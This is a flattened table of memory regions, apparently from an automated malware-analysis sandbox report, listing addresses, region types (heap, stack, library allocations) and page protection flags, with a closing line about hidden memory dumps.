stack
|
page read and write
|
||
1E197980000
|
heap
|
page execute and read and write
|
||
7FFB4ACB2000
|
trusted library allocation
|
page read and write
|
||
B1B000
|
heap
|
page read and write
|
||
7FF668D75000
|
unkown
|
page write copy
|
||
7CD000
|
heap
|
page read and write
|
||
1E195CEA000
|
heap
|
page read and write
|
||
80A000
|
heap
|
page read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
7FF68E160000
|
unkown
|
page readonly
|
||
47DE000
|
stack
|
page read and write
|
||
289BFEA5000
|
heap
|
page read and write
|
||
26EEA6A0000
|
heap
|
page read and write
|
||
1E199426000
|
trusted library allocation
|
page read and write
|
||
48DF000
|
stack
|
page read and write
|
||
2595E7C0000
|
heap
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
7FFB4AAED000
|
trusted library allocation
|
page execute and read and write
|
||
E5E378000
|
stack
|
page read and write
|
||
289A85F0000
|
trusted library allocation
|
page read and write
|
||
26EEA6D0000
|
unkown
|
page read and write
|
||
1E195EF0000
|
heap
|
page read and write
|
||
411000
|
unkown
|
page execute read
|
||
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
808000
|
heap
|
page read and write
|
||
1E197700000
|
heap
|
page readonly
|
||
7FFB4AEEC000
|
trusted library allocation
|
page read and write
|
||
289BFE8D000
|
heap
|
page read and write
|
||
7FFB4AE33000
|
trusted library allocation
|
page read and write
|
||
26EEAED2000
|
heap
|
page read and write
|
||
32FB000
|
heap
|
page read and write
|
||
7FFB4AE39000
|
trusted library allocation
|
page read and write
|
||
1E198558000
|
trusted library allocation
|
page read and write
|
||
7FF68E6E7000
|
unkown
|
page read and write
|
||
13C5000
|
heap
|
page read and write
|
||
7FFB4AAF0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAD0000
|
trusted library allocation
|
page read and write
|
||
412000
|
unkown
|
page readonly
|
||
7FF68E6E9000
|
unkown
|
page readonly
|
||
7FFB4AF36000
|
trusted library allocation
|
page read and write
|
||
A92000
|
unkown
|
page readonly
|
||
156CEFDB000
|
heap
|
page read and write
|
||
7FFB4AE60000
|
trusted library allocation
|
page read and write
|
||
E5E4FE000
|
stack
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
289A7430000
|
trusted library section
|
page read and write
|
||
7FFB4AADD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF6E6981000
|
unkown
|
page execute read
|
||
7FFB4AB1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ADD0000
|
trusted library allocation
|
page read and write
|
||
24A0000
|
heap
|
page read and write
|
||
156CF1A0000
|
heap
|
page execute and read and write
|
||
26EEB04D000
|
heap
|
page read and write
|
||
A52000
|
unkown
|
page readonly
|
||
5F5000
|
heap
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
156B82F1000
|
trusted library allocation
|
page read and write
|
||
411000
|
unkown
|
page execute read
|
||
7FFB4AE80000
|
trusted library allocation
|
page read and write
|
||
7FF668D72000
|
unkown
|
page read and write
|
||
7FFB4AAC2000
|
trusted library allocation
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
415F000
|
stack
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3EBA000
|
trusted library allocation
|
page read and write
|
||
7DF4A3510000
|
trusted library allocation
|
page execute and read and write
|
||
B524B8A000
|
stack
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
156B822D000
|
trusted library allocation
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
7FFB4ADF0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC7A000
|
trusted library allocation
|
page read and write
|
||
24EBE480000
|
unkown
|
page read and write
|
||
3B5E000
|
stack
|
page read and write
|
||
2595CE50000
|
heap
|
page read and write
|
||
2595CF89000
|
heap
|
page read and write
|
||
2C3D000
|
stack
|
page read and write
|
||
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
B523873000
|
stack
|
page read and write
|
||
13000
|
unkown
|
page write copy
|
||
156CF3A9000
|
heap
|
page read and write
|
||
2595CEA3000
|
heap
|
page read and write
|
||
63F000
|
stack
|
page read and write
|
||
13A5000
|
heap
|
page read and write
|
||
E5EFCC000
|
stack
|
page read and write
|
||
26EEB06B000
|
heap
|
page read and write
|
||
A90000
|
unkown
|
page readonly
|
||
7E4000
|
unkown
|
page read and write
|
||
26E812E2000
|
trusted library allocation
|
page read and write
|
||
1D74D000
|
stack
|
page read and write
|
||
7FFB4ADA0000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
7FFB4ABF0000
|
trusted library allocation
|
page execute and read and write
|
||
289BFB30000
|
heap
|
page execute and read and write
|
||
289B76C1000
|
trusted library allocation
|
page read and write
|
||
26EEAFC4000
|
heap
|
page read and write
|
||
32E4000
|
heap
|
page read and write
|
||
1E195F50000
|
heap
|
page read and write
|
||
26EEAEB0000
|
heap
|
page read and write
|
||
1E195F40000
|
trusted library allocation
|
page read and write
|
||
1E1AFE90000
|
heap
|
page read and write
|
||
7FFB4ABAC000
|
trusted library allocation
|
page execute and read and write
|
||
289BFA30000
|
heap
|
page read and write
|
||
1CF40000
|
heap
|
page read and write
|
||
7E3000
|
heap
|
page read and write
|
||
269216A5000
|
heap
|
page read and write
|
||
7FFB4AAFD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ACA4000
|
trusted library allocation
|
page read and write
|
||
2A4F000
|
stack
|
page read and write
|
||
7C3000
|
heap
|
page read and write
|
||
1E195C90000
|
heap
|
page read and write
|
There are 1453 hidden memdumps, click here to show them.